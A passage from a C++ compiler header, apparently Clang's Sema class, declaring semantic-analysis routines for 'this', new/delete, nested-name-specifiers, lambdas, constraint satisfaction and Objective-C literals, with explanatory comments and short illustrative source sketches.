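// (source sketches only):
//   (args + ...)          // unary right fold
//   (... + args)          // unary left fold
//   (args + ... + init)   // binary right fold
//   (init + ... + args)   // binary left fold
// An empty expansion of 'args' reaches BuildEmptyCXXFoldExpr, which is only
// valid for the operators with an identity element: '&&', '||', and ','.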
/// ActOnCXXThis - Parse 'this' pointer.
ExprResult ActOnCXXThis(SourceLocation loc);
/// Build a CXXThisExpr and mark it referenced in the current context.
Expr *BuildCXXThisExpr(SourceLocation Loc, QualType Type, bool IsImplicit);
void MarkThisReferenced(CXXThisExpr *This);
/// Try to retrieve the type of the 'this' pointer.
///
/// \returns The type of 'this', if possible. Otherwise, returns a NULL type.
QualType getCurrentThisType();
/// When non-NULL, the C++ 'this' expression is allowed despite the
/// current context not being a non-static member function. In such cases,
/// this provides the type used for 'this'.
QualType CXXThisTypeOverride;
/// RAII object used to temporarily allow the C++ 'this' expression
/// to be used, with the given qualifiers on the current class type.
class CXXThisScopeRAII {
Sema &S;
QualType OldCXXThisTypeOverride;
bool Enabled;
public:
/// Introduce a new scope where 'this' may be allowed (when enabled),
/// using the given declaration (which is either a class template or a
/// class), along with the qualifiers placed on '*this'.
CXXThisScopeRAII(Sema &S, Decl *ContextDecl, Qualifiers CXXThisTypeQuals,
bool Enabled = true);
~CXXThisScopeRAII();
};
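// A minimal usage sketch for the RAII object above (hypothetical; assumes a
// Sema instance 'SemaRef' and a class declaration 'RD' in scope):
//   {
//     Sema::CXXThisScopeRAII ThisScope(SemaRef, RD, Qualifiers());
//     // ... 'this' may be used here, e.g. while checking an exception spec.
//   } // the previous CXXThisTypeOverride is restored on scope exit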
/// Make sure the value of 'this' is actually available in the current
/// context, if it is a potentially evaluated context.
///
/// \param Loc The location at which the capture of 'this' occurs.
///
/// \param Explicit Whether 'this' is explicitly captured in a lambda
/// capture list.
///
/// \param FunctionScopeIndexToStopAt If non-null, it points to the index
/// of the FunctionScopeInfo stack beyond which we do not attempt to capture.
/// This is useful when enclosing lambdas must speculatively capture
/// 'this' that may or may not be used in certain specializations of
/// a nested generic lambda (depending on whether the name resolves to
/// a non-static member function or a static function).
/// \returns true on failure, false on success.
bool CheckCXXThisCapture(SourceLocation Loc, bool Explicit = false,
bool BuildAndDiagnose = true,
const unsigned *const FunctionScopeIndexToStopAt = nullptr,
bool ByCopy = false);
/// Determine whether the given type is the type of *this that is used
/// outside of the body of a member function for a type that is currently
/// being defined.
bool isThisOutsideMemberFunctionBody(QualType BaseType);
/// ActOnCXXBoolLiteral - Parse {true,false} literals.
ExprResult ActOnCXXBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
/// ActOnObjCBoolLiteral - Parse {__objc_yes,__objc_no} literals.
ExprResult ActOnObjCBoolLiteral(SourceLocation OpLoc, tok::TokenKind Kind);
ExprResult
ActOnObjCAvailabilityCheckExpr(llvm::ArrayRef<AvailabilitySpec> AvailSpecs,
SourceLocation AtLoc, SourceLocation RParen);
/// ActOnCXXNullPtrLiteral - Parse 'nullptr'.
ExprResult ActOnCXXNullPtrLiteral(SourceLocation Loc);
/// ActOnCXXThrow - Parse throw expressions.
ExprResult ActOnCXXThrow(Scope *S, SourceLocation OpLoc, Expr *expr);
ExprResult BuildCXXThrow(SourceLocation OpLoc, Expr *Ex,
bool IsThrownVarInScope);
bool CheckCXXThrowOperand(SourceLocation ThrowLoc, QualType ThrowTy, Expr *E);
/// ActOnCXXTypeConstructExpr - Parse construction of a specified type.
/// Can be interpreted either as function-style casting ("int(x)")
/// or class type construction ("ClassType(x,y,z)")
/// or creation of a value-initialized type ("int()").
ExprResult ActOnCXXTypeConstructExpr(ParsedType TypeRep,
SourceLocation LParenOrBraceLoc,
MultiExprArg Exprs,
SourceLocation RParenOrBraceLoc,
bool ListInitialization);
ExprResult BuildCXXTypeConstructExpr(TypeSourceInfo *Type,
SourceLocation LParenLoc,
MultiExprArg Exprs,
SourceLocation RParenLoc,
bool ListInitialization);
/// ActOnCXXNew - Parsed a C++ 'new' expression.
ExprResult ActOnCXXNew(SourceLocation StartLoc, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens, Declarator &D,
Expr *Initializer);
ExprResult BuildCXXNew(SourceRange Range, bool UseGlobal,
SourceLocation PlacementLParen,
MultiExprArg PlacementArgs,
SourceLocation PlacementRParen,
SourceRange TypeIdParens,
QualType AllocType,
TypeSourceInfo *AllocTypeInfo,
Optional<Expr *> ArraySize,
SourceRange DirectInitRange,
Expr *Initializer);
/// Determine whether \p FD is an aligned allocation or deallocation
/// function that is unavailable.
bool isUnavailableAlignedAllocationFunction(const FunctionDecl &FD) const;
/// Produce diagnostics if \p FD is an aligned allocation or deallocation
/// function that is unavailable.
void diagnoseUnavailableAlignedAllocation(const FunctionDecl &FD,
SourceLocation Loc);
bool CheckAllocatedType(QualType AllocType, SourceLocation Loc,
SourceRange R);
/// The scope in which to find allocation functions.
enum AllocationFunctionScope {
/// Only look for allocation functions in the global scope.
AFS_Global,
/// Only look for allocation functions in the scope of the
/// allocated class.
AFS_Class,
/// Look for allocation functions in both the global scope
/// and in the scope of the allocated class.
AFS_Both
};
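// For illustration of the scopes above (a sketch of the language rule, not
// code from this file): for a plain 'new T(...)', a class-specific
// 'operator new' declared in T is preferred and the global one serves as a
// fallback, whereas '::new T(...)' restricts lookup to the global scope
// (AFS_Global).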
/// Finds the overloads of operator new and delete that are appropriate
/// for the allocation.
bool FindAllocationFunctions(SourceLocation StartLoc, SourceRange Range,
AllocationFunctionScope NewScope,
AllocationFunctionScope DeleteScope,
QualType AllocType, bool IsArray,
bool &PassAlignment, MultiExprArg PlaceArgs,
FunctionDecl *&OperatorNew,
FunctionDecl *&OperatorDelete,
bool Diagnose = true);
void DeclareGlobalNewDelete();
void DeclareGlobalAllocationFunction(DeclarationName Name, QualType Return,
ArrayRef<QualType> Params);
bool FindDeallocationFunction(SourceLocation StartLoc, CXXRecordDecl *RD,
DeclarationName Name, FunctionDecl* &Operator,
bool Diagnose = true);
FunctionDecl *FindUsualDeallocationFunction(SourceLocation StartLoc,
bool CanProvideSize,
bool Overaligned,
DeclarationName Name);
FunctionDecl *FindDeallocationFunctionForDestructor(SourceLocation StartLoc,
CXXRecordDecl *RD);
/// ActOnCXXDelete - Parsed a C++ 'delete' expression
ExprResult ActOnCXXDelete(SourceLocation StartLoc,
bool UseGlobal, bool ArrayForm,
Expr *Operand);
void CheckVirtualDtorCall(CXXDestructorDecl *dtor, SourceLocation Loc,
bool IsDelete, bool CallCanBeVirtual,
bool WarnOnNonAbstractTypes,
SourceLocation DtorLoc);
ExprResult ActOnNoexceptExpr(SourceLocation KeyLoc, SourceLocation LParen,
Expr *Operand, SourceLocation RParen);
ExprResult BuildCXXNoexceptExpr(SourceLocation KeyLoc, Expr *Operand,
SourceLocation RParen);
/// Parsed one of the type trait support pseudo-functions.
ExprResult ActOnTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<ParsedType> Args,
SourceLocation RParenLoc);
ExprResult BuildTypeTrait(TypeTrait Kind, SourceLocation KWLoc,
ArrayRef<TypeSourceInfo *> Args,
SourceLocation RParenLoc);
/// ActOnArrayTypeTrait - Parsed one of the binary type trait support
/// pseudo-functions.
ExprResult ActOnArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
ParsedType LhsTy,
Expr *DimExpr,
SourceLocation RParen);
ExprResult BuildArrayTypeTrait(ArrayTypeTrait ATT,
SourceLocation KWLoc,
TypeSourceInfo *TSInfo,
Expr *DimExpr,
SourceLocation RParen);
/// ActOnExpressionTrait - Parsed one of the unary type trait support
/// pseudo-functions.
ExprResult ActOnExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult BuildExpressionTrait(ExpressionTrait OET,
SourceLocation KWLoc,
Expr *Queried,
SourceLocation RParen);
ExprResult ActOnStartCXXMemberReference(Scope *S,
Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
ParsedType &ObjectType,
bool &MayBePseudoDestructor);
ExprResult BuildPseudoDestructorExpr(Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
const CXXScopeSpec &SS,
TypeSourceInfo *ScopeType,
SourceLocation CCLoc,
SourceLocation TildeLoc,
PseudoDestructorTypeStorage DestroyedType);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
CXXScopeSpec &SS,
UnqualifiedId &FirstTypeName,
SourceLocation CCLoc,
SourceLocation TildeLoc,
UnqualifiedId &SecondTypeName);
ExprResult ActOnPseudoDestructorExpr(Scope *S, Expr *Base,
SourceLocation OpLoc,
tok::TokenKind OpKind,
SourceLocation TildeLoc,
const DeclSpec& DS);
/// MaybeCreateExprWithCleanups - If the current full-expression
/// requires any cleanups, surround it with a ExprWithCleanups node.
/// Otherwise, just returns the passed-in expression.
Expr *MaybeCreateExprWithCleanups(Expr *SubExpr);
Stmt *MaybeCreateStmtWithCleanups(Stmt *SubStmt);
ExprResult MaybeCreateExprWithCleanups(ExprResult SubExpr);
MaterializeTemporaryExpr *
CreateMaterializeTemporaryExpr(QualType T, Expr *Temporary,
bool BoundToLvalueReference);
ExprResult ActOnFinishFullExpr(Expr *Expr, bool DiscardedValue) {
return ActOnFinishFullExpr(
Expr, Expr ? Expr->getExprLoc() : SourceLocation(), DiscardedValue);
}
ExprResult ActOnFinishFullExpr(Expr *Expr, SourceLocation CC,
bool DiscardedValue, bool IsConstexpr = false);
StmtResult ActOnFinishFullStmt(Stmt *Stmt);
// Marks SS invalid if it represents an incomplete type.
bool RequireCompleteDeclContext(CXXScopeSpec &SS, DeclContext *DC);
DeclContext *computeDeclContext(QualType T);
DeclContext *computeDeclContext(const CXXScopeSpec &SS,
bool EnteringContext = false);
bool isDependentScopeSpecifier(const CXXScopeSpec &SS);
CXXRecordDecl *getCurrentInstantiationOf(NestedNameSpecifier *NNS);
/// The parser has parsed a global nested-name-specifier '::'.
///
/// \param CCLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXGlobalScopeSpecifier(SourceLocation CCLoc, CXXScopeSpec &SS);
/// The parser has parsed a '__super' nested-name-specifier.
///
/// \param SuperLoc The location of the '__super' keyword.
///
/// \param ColonColonLoc The location of the '::'.
///
/// \param SS The nested-name-specifier, which will be updated in-place
/// to reflect the parsed nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnSuperScopeSpecifier(SourceLocation SuperLoc,
SourceLocation ColonColonLoc, CXXScopeSpec &SS);
bool isAcceptableNestedNameSpecifier(const NamedDecl *SD,
bool *CanCorrect = nullptr);
NamedDecl *FindFirstQualifierInScope(Scope *S, NestedNameSpecifier *NNS);
/// Keeps information about an identifier in a nested-name-spec.
///
struct NestedNameSpecInfo {
/// The type of the object, if we're parsing nested-name-specifier in
/// a member access expression.
ParsedType ObjectType;
/// The identifier preceding the '::'.
IdentifierInfo *Identifier;
/// The location of the identifier.
SourceLocation IdentifierLoc;
/// The location of the '::'.
SourceLocation CCLoc;
/// Creates info object for the most typical case.
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, ParsedType ObjectType = ParsedType())
: ObjectType(ObjectType), Identifier(II), IdentifierLoc(IdLoc),
CCLoc(ColonColonLoc) {
}
NestedNameSpecInfo(IdentifierInfo *II, SourceLocation IdLoc,
SourceLocation ColonColonLoc, QualType ObjectType)
: ObjectType(ParsedType::make(ObjectType)), Identifier(II),
IdentifierLoc(IdLoc), CCLoc(ColonColonLoc) {
}
};
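// For illustration: while parsing 'N::M::f', the 'M::' piece would be
// described by a NestedNameSpecInfo whose Identifier is 'M', with
// IdentifierLoc at 'M' and CCLoc at the following '::' (a sketch of the
// intended usage, not code from this file).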
bool isNonTypeNestedNameSpecifier(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo);
bool BuildCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
NamedDecl *ScopeLookupResult,
bool ErrorRecoveryLookup,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
/// The parser has parsed a nested-name-specifier 'identifier::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param IdInfo Parser information about an identifier in the
/// nested-name-spec.
///
/// \param EnteringContext Whether we're entering the context nominated by
/// this nested-name-specifier.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param ErrorRecoveryLookup If true, then this method is called to improve
/// error recovery. In this case, no error message is emitted.
///
/// \param IsCorrectedToColon If not null, suggestions to replace '::' -> ':'
/// are allowed. The bool value pointed to by this parameter is set to 'true'
/// if the identifier is treated as if it were followed by ':', not '::'.
///
/// \param OnlyNamespace If true, only considers namespaces in lookup.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
NestedNameSpecInfo &IdInfo,
bool EnteringContext,
CXXScopeSpec &SS,
bool ErrorRecoveryLookup = false,
bool *IsCorrectedToColon = nullptr,
bool OnlyNamespace = false);
ExprResult ActOnDecltypeExpression(Expr *E);
bool ActOnCXXNestedNameSpecifierDecltype(CXXScopeSpec &SS,
const DeclSpec &DS,
SourceLocation ColonColonLoc);
bool IsInvalidUnlessNestedName(Scope *S, CXXScopeSpec &SS,
NestedNameSpecInfo &IdInfo,
bool EnteringContext);
/// The parser has parsed a nested-name-specifier
/// 'template[opt] template-name < template-args >::'.
///
/// \param S The scope in which this nested-name-specifier occurs.
///
/// \param SS The nested-name-specifier, which is both an input
/// parameter (the nested-name-specifier before this type) and an
/// output parameter (containing the full nested-name-specifier,
/// including this new type).
///
/// \param TemplateKWLoc the location of the 'template' keyword, if any.
/// \param TemplateName the template name.
/// \param TemplateNameLoc The location of the template name.
/// \param LAngleLoc The location of the opening angle bracket ('<').
/// \param TemplateArgs The template arguments.
/// \param RAngleLoc The location of the closing angle bracket ('>').
/// \param CCLoc The location of the '::'.
///
/// \param EnteringContext Whether we're entering the context of the
/// nested-name-specifier.
///
/// \returns true if an error occurred, false otherwise.
bool ActOnCXXNestedNameSpecifier(Scope *S,
CXXScopeSpec &SS,
SourceLocation TemplateKWLoc,
TemplateTy TemplateName,
SourceLocation TemplateNameLoc,
SourceLocation LAngleLoc,
ASTTemplateArgsPtr TemplateArgs,
SourceLocation RAngleLoc,
SourceLocation CCLoc,
bool EnteringContext);
/// Given a C++ nested-name-specifier, produce an annotation value
/// that the parser can use later to reconstruct the given
/// nested-name-specifier.
///
/// \param SS A nested-name-specifier.
///
/// \returns A pointer containing all of the information in the
/// nested-name-specifier \p SS.
void *SaveNestedNameSpecifierAnnotation(CXXScopeSpec &SS);
/// Given an annotation pointer for a nested-name-specifier, restore
/// the nested-name-specifier structure.
///
/// \param Annotation The annotation pointer, produced by
/// \c SaveNestedNameSpecifierAnnotation().
///
/// \param AnnotationRange The source range corresponding to the annotation.
///
/// \param SS The nested-name-specifier that will be updated with the contents
/// of the annotation pointer.
void RestoreNestedNameSpecifierAnnotation(void *Annotation,
SourceRange AnnotationRange,
CXXScopeSpec &SS);
bool ShouldEnterDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclaratorScope - Called when a C++ scope specifier (global
/// scope or nested-name-specifier) is parsed, part of a declarator-id.
/// After this method is called, according to [C++ 3.4.3p3], names should be
/// looked up in the declarator-id's scope, until the declarator is parsed and
/// ActOnCXXExitDeclaratorScope is called.
/// The 'SS' should be a non-empty valid CXXScopeSpec.
bool ActOnCXXEnterDeclaratorScope(Scope *S, CXXScopeSpec &SS);
/// ActOnCXXExitDeclaratorScope - Called when a declarator that previously
/// invoked ActOnCXXEnterDeclaratorScope(), is finished. 'SS' is the same
/// CXXScopeSpec that was passed to ActOnCXXEnterDeclaratorScope as well.
/// Used to indicate that names should revert to being looked up in the
/// defining scope.
void ActOnCXXExitDeclaratorScope(Scope *S, const CXXScopeSpec &SS);
/// ActOnCXXEnterDeclInitializer - Invoked when we are about to parse an
/// initializer for the declaration 'Dcl'.
/// After this method is called, according to [C++ 3.4.1p13], if 'Dcl' is a
/// static data member of class X, names should be looked up in the scope of
/// class X.
void ActOnCXXEnterDeclInitializer(Scope *S, Decl *Dcl);
/// ActOnCXXExitDeclInitializer - Invoked after we are finished parsing an
/// initializer for the declaration 'Dcl'.
void ActOnCXXExitDeclInitializer(Scope *S, Decl *Dcl);
/// Create a new lambda closure type.
CXXRecordDecl *createLambdaClosureType(SourceRange IntroducerRange,
TypeSourceInfo *Info,
bool KnownDependent,
LambdaCaptureDefault CaptureDefault);
/// Start the definition of a lambda expression.
CXXMethodDecl *startLambdaDefinition(CXXRecordDecl *Class,
SourceRange IntroducerRange,
TypeSourceInfo *MethodType,
SourceLocation EndLoc,
ArrayRef<ParmVarDecl *> Params,
ConstexprSpecKind ConstexprKind,
Expr *TrailingRequiresClause);
/// Number lambda for linkage purposes if necessary.
void handleLambdaNumbering(
CXXRecordDecl *Class, CXXMethodDecl *Method,
Optional<std::tuple<unsigned, bool, Decl *>> Mangling = None);
/// Endow the lambda scope info with the relevant properties.
void buildLambdaScope(sema::LambdaScopeInfo *LSI,
CXXMethodDecl *CallOperator,
SourceRange IntroducerRange,
LambdaCaptureDefault CaptureDefault,
SourceLocation CaptureDefaultLoc,
bool ExplicitParams,
bool ExplicitResultType,
bool Mutable);
/// Perform initialization analysis of the init-capture and perform
/// any implicit conversions such as an lvalue-to-rvalue conversion if
/// not being used to initialize a reference.
ParsedType actOnLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
IdentifierInfo *Id, LambdaCaptureInitKind InitKind, Expr *&Init) {
return ParsedType::make(buildLambdaInitCaptureInitialization(
Loc, ByRef, EllipsisLoc, None, Id,
InitKind != LambdaCaptureInitKind::CopyInit, Init));
}
QualType buildLambdaInitCaptureInitialization(
SourceLocation Loc, bool ByRef, SourceLocation EllipsisLoc,
Optional<unsigned> NumExpansions, IdentifierInfo *Id, bool DirectInit,
Expr *&Init);
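// For illustration, the init-captures the routine above analyzes (a source
// sketch, not code from this file):
//   auto L = [n = computeValue(), &r = target]() { return n; };
// 'n = computeValue()' is a copy init-capture (so DirectInit is false here),
// while '&r = target' is a by-reference init-capture.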
/// Create a dummy variable within the DeclContext of the lambda's
/// call operator, for name lookup purposes for a lambda init capture.
///
/// CodeGen handles emission of lambda captures, ignoring these dummy
/// variables appropriately.
VarDecl *createLambdaInitCaptureVarDecl(SourceLocation Loc,
QualType InitCaptureType,
SourceLocation EllipsisLoc,
IdentifierInfo *Id,
unsigned InitStyle, Expr *Init);
/// Add an init-capture to a lambda scope.
void addInitCapture(sema::LambdaScopeInfo *LSI, VarDecl *Var);
/// Note that we have finished the explicit captures for the
/// given lambda.
void finishLambdaExplicitCaptures(sema::LambdaScopeInfo *LSI);
/// \brief This is called after parsing the explicit template parameter list
/// on a lambda (if it exists) in C++2a.
void ActOnLambdaExplicitTemplateParameterList(SourceLocation LAngleLoc,
ArrayRef<NamedDecl *> TParams,
SourceLocation RAngleLoc);
/// Introduce the lambda parameters into scope.
void addLambdaParameters(
ArrayRef<LambdaIntroducer::LambdaCapture> Captures,
CXXMethodDecl *CallOperator, Scope *CurScope);
/// Deduce a block or lambda's return type based on the return
/// statements present in the body.
void deduceClosureReturnType(sema::CapturingScopeInfo &CSI);
/// ActOnStartOfLambdaDefinition - This is called just before we start
/// parsing the body of a lambda; it analyzes the explicit captures and
/// arguments, and sets up various data-structures for the body of the
/// lambda.
void ActOnStartOfLambdaDefinition(LambdaIntroducer &Intro,
Declarator &ParamInfo, Scope *CurScope);
/// ActOnLambdaError - If there is an error parsing a lambda, this callback
/// is invoked to pop the information about the lambda.
void ActOnLambdaError(SourceLocation StartLoc, Scope *CurScope,
bool IsInstantiation = false);
/// ActOnLambdaExpr - This is called when the body of a lambda expression
/// was successfully completed.
ExprResult ActOnLambdaExpr(SourceLocation StartLoc, Stmt *Body,
Scope *CurScope);
/// Does copying/destroying the captured variable have side effects?
bool CaptureHasSideEffects(const sema::Capture &From);
/// Diagnose if an explicit lambda capture is unused. Returns true if a
/// diagnostic is emitted.
bool DiagnoseUnusedLambdaCapture(SourceRange CaptureRange,
const sema::Capture &From);
/// Build a FieldDecl suitable to hold the given capture.
FieldDecl *BuildCaptureField(RecordDecl *RD, const sema::Capture &Capture);
/// Initialize the given capture with a suitable expression.
ExprResult BuildCaptureInit(const sema::Capture &Capture,
SourceLocation ImplicitCaptureLoc,
bool IsOpenMPMapping = false);
/// Complete a lambda-expression having processed and attached the
/// lambda body.
ExprResult BuildLambdaExpr(SourceLocation StartLoc, SourceLocation EndLoc,
sema::LambdaScopeInfo *LSI);
/// Get the return type to use for a lambda's conversion function(s) to
/// function pointer type, given the type of the call operator.
QualType
getLambdaConversionFunctionResultType(const FunctionProtoType *CallOpType);
/// Define the "body" of the conversion from a lambda object to a
/// function pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToFunctionPointerConversion(
SourceLocation CurrentLoc, CXXConversionDecl *Conv);
/// Define the "body" of the conversion from a lambda object to a
/// block pointer.
///
/// This routine doesn't actually define a sensible body; rather, it fills
/// in the initialization expression needed to copy the lambda object into
/// the block, and IR generation actually generates the real body of the
/// block pointer conversion.
void DefineImplicitLambdaToBlockPointerConversion(SourceLocation CurrentLoc,
CXXConversionDecl *Conv);
ExprResult BuildBlockForLambdaConversion(SourceLocation CurrentLocation,
SourceLocation ConvLocation,
CXXConversionDecl *Conv,
Expr *Src);
/// Check whether the given expression is a valid constraint expression.
/// If it is not, a diagnostic is emitted and false is returned;
/// PossibleNonPrimary will be set to true if the failure might be due to a
/// non-primary expression being used as an atomic constraint.
bool CheckConstraintExpression(Expr *CE, Token NextToken = Token(),
bool *PossibleNonPrimary = nullptr,
bool IsTrailingRequiresClause = false);
/// Check whether the given type-dependent expression will be the name of a
/// function or another callable function-like entity (e.g. a function
/// template or overload set) for any substitution.
bool IsDependentFunctionNameExpr(Expr *E);
private:
/// Caches pairs of template-like decls whose associated constraints were
/// checked for subsumption and whether or not the first's constraints did in
/// fact subsume the second's.
llvm::DenseMap<std::pair<NamedDecl *, NamedDecl *>, bool> SubsumptionCache;
/// Caches the normalized associated constraints of declarations (concepts or
/// constrained declarations). If an error occurred while normalizing the
/// associated constraints of the template or concept, nullptr will be cached
/// here.
llvm::DenseMap<NamedDecl *, NormalizedConstraint *>
NormalizationCache;
llvm::ContextualFoldingSet<ConstraintSatisfaction, const ASTContext &>
SatisfactionCache;
public:
const NormalizedConstraint *
getNormalizedAssociatedConstraints(
NamedDecl *ConstrainedDecl, ArrayRef<const Expr *> AssociatedConstraints);
/// \brief Check whether the given declaration's associated constraints are
/// at least as constrained as another declaration's according to the
/// partial ordering of constraints.
///
/// \param Result If no error occurred, receives the result: true if D1 is
/// at least as constrained as D2, false otherwise.
///
/// \returns true if an error occurred, false otherwise.
bool IsAtLeastAsConstrained(NamedDecl *D1, ArrayRef<const Expr *> AC1,
NamedDecl *D2, ArrayRef<const Expr *> AC2,
bool &Result);
/// Check whether D1 would have been at least as constrained as D2 if a pair
/// of atomic constraints involved had been declared in a concept rather than
/// repeated in two separate places in code, and emit a diagnostic if so.
/// \returns true if such a diagnostic was emitted, false otherwise.
bool MaybeEmitAmbiguousAtomicConstraintsDiagnostic(NamedDecl *D1,
ArrayRef<const Expr *> AC1, NamedDecl *D2, ArrayRef<const Expr *> AC2);
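// For illustration, the situation the diagnostic above targets (a source
// sketch, not code from this file):
//   template <class T> void f(T) requires (sizeof(T) > 4);          // #1
//   template <class T> void f(T) requires (sizeof(T) > 4) && true;  // #2
// The two 'sizeof(T) > 4' atoms are spelled in two separate places, so
// neither subsumes the other; naming them through a shared concept would
// make the overloads partially ordered.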
/// \brief Check whether the given list of constraint expressions are
/// satisfied (as if in a 'conjunction') given template arguments.
/// \param Template the template-like entity that triggered the constraints
/// check (either a concept or a constrained entity).
/// \param ConstraintExprs a list of constraint expressions, treated as if
/// they were 'AND'ed together.
/// \param TemplateArgs the list of template arguments to substitute into the
/// constraint expression.
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
/// \param Satisfaction if true is returned, will contain details of the
/// satisfaction, with enough information to diagnose an unsatisfied
/// expression.
/// \returns true if an error occurred and satisfaction could not be checked,
/// false otherwise.
bool CheckConstraintSatisfaction(
const NamedDecl *Template, ArrayRef<const Expr *> ConstraintExprs,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange, ConstraintSatisfaction &Satisfaction);
/// \brief Check whether the given non-dependent constraint expression is
/// satisfied. Returns false and updates Satisfaction with the satisfaction
/// verdict if successful; emits a diagnostic and returns true if an error
/// occurred and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckConstraintSatisfaction(const Expr *ConstraintExpr,
ConstraintSatisfaction &Satisfaction);
/// Check whether the given function decl's trailing requires clause is
/// satisfied, if any. Returns false and updates Satisfaction with the
/// satisfaction verdict if successful; emits a diagnostic and returns true
/// if an error occurred and satisfaction could not be determined.
///
/// \returns true if an error occurred, false otherwise.
bool CheckFunctionConstraints(const FunctionDecl *FD,
ConstraintSatisfaction &Satisfaction,
SourceLocation UsageLoc = SourceLocation());
/// \brief Ensure that the given template arguments satisfy the constraints
/// associated with the given template, emitting a diagnostic if they do not.
///
/// \param Template The template to which the template arguments are being
/// provided.
///
/// \param TemplateArgs The converted, canonicalized template arguments.
///
/// \param TemplateIDRange The source range of the template id that
/// caused the constraints check.
///
/// \returns true if the constraints are not satisfied or could not be checked
/// for satisfaction, false if the constraints are satisfied.
bool EnsureTemplateArgumentListConstraints(TemplateDecl *Template,
ArrayRef<TemplateArgument> TemplateArgs,
SourceRange TemplateIDRange);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
/// \param First whether this is the first time an unsatisfied constraint is
/// diagnosed for this error.
void
DiagnoseUnsatisfiedConstraint(const ConstraintSatisfaction &Satisfaction,
bool First = true);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied.
void
DiagnoseUnsatisfiedConstraint(const ASTConstraintSatisfaction &Satisfaction,
bool First = true);
/// \brief Emit diagnostics explaining why a constraint expression was deemed
/// unsatisfied because it was ill-formed.
void DiagnoseUnsatisfiedIllFormedConstraint(SourceLocation DiagnosticLocation,
StringRef Diagnostic);
void DiagnoseRedeclarationConstraintMismatch(SourceLocation Old,
SourceLocation New);
// ParseObjCStringLiteral - Parse Objective-C string literals.
ExprResult ParseObjCStringLiteral(SourceLocation *AtLocs,
ArrayRef<Expr *> Strings);
ExprResult BuildObjCStringLiteral(SourceLocation AtLoc, StringLiteral *S);
/// BuildObjCNumericLiteral - builds an ObjCBoxedExpr AST node for the
/// numeric literal expression. Type of the expression will be "NSNumber *"
/// or "id" if NSNumber is unavailable.
ExprResult BuildObjCNumericLiteral(SourceLocation AtLoc, Expr *Number);
ExprResult ActOnObjCBoolLiteral(SourceLocation AtLoc, SourceLocation ValueLoc,
bool Value);
ExprResult BuildObjCArrayLiteral(SourceRange SR, MultiExprArg Elements);
/// BuildObjCBoxedExpr - builds an ObjCBoxedExpr AST node for the
/// '@' prefixed parenthesized expression. The type of the expression will
/// either be "NSNumber *", "NSString *" or "NSValue *" depending on the type
/// of ValueType, which is allowed to be a built-in numeric type, "char *",
/// "const char *" or C structure with attribute 'objc_boxable'.
ExprResult BuildObjCBoxedExpr(SourceRange SR, Expr *ValueExpr);
ExprResult BuildObjCSubscriptExpression(SourceLocation RB, Expr *BaseExpr,
Expr *IndexExpr,
ObjCMethodDecl *getterMethod,
ObjCMethodDecl *setterMethod);
ExprResult BuildObjCDictionaryLiteral(SourceRange SR,
MutableArrayRef<ObjCDictionaryElement> Elements);
ExprResult BuildObjCEncodeExpression(SourceLocation AtLoc,
TypeSourceInfo *EncodedTypeInfo,
SourceLocation RParenLoc);
ExprResult BuildCXXMemberCallExpr(Expr *Exp, NamedDecl *FoundDecl,
CXXConversionDecl *Method,
bool HadMultipleCandidates);
ExprResult ParseObjCEncodeExpression(SourceLocation AtLoc,
SourceLocation EncodeLoc,
SourceLocation LParenLoc,
ParsedType Ty,
SourceLocation RParenLoc);
/// ParseObjCSelectorExpression - Build selector expression for \@selector
ExprResult ParseObjCSelectorExpression(Selector Sel,
SourceLocation AtLoc,
SourceLocation SelLoc,
SourceLocation LParenLoc,
SourceLocation RParenLoc,
bool WarnMultipleSelectors);
/// ParseObjCProtocolExpression - Build protocol expression for \@protocol
ExprResult ParseObjCProtocolExpression(IdentifierInfo * ProtocolName,
SourceLocation AtLoc,
SourceLocation ProtoLoc,
SourceLocation LParenLoc,
SourceLocation ProtoIdLoc,
SourceLocation RParenLoc);
//===--------------------------------------------------------------------===//
// C++ Declarations
//
Decl *ActOnStartLinkageSpecification(Scope *S,
SourceLocation ExternLoc,
Expr *LangStr,
SourceLocation LBraceLoc);
Decl *ActOnFinishLinkageSpecification(Scope *S,
Decl *LinkageSpec,
SourceLocation RBraceLoc);
//===--------------------------------------------------------------------===//
// C++ Classes
//
CXXRecordDecl *getCurrentClass(Scope *S, const CXXScopeSpec *SS);
bool isCurrentClassName(const IdentifierInfo &II, Scope *S,
const CXXScopeSpec *SS = nullptr);
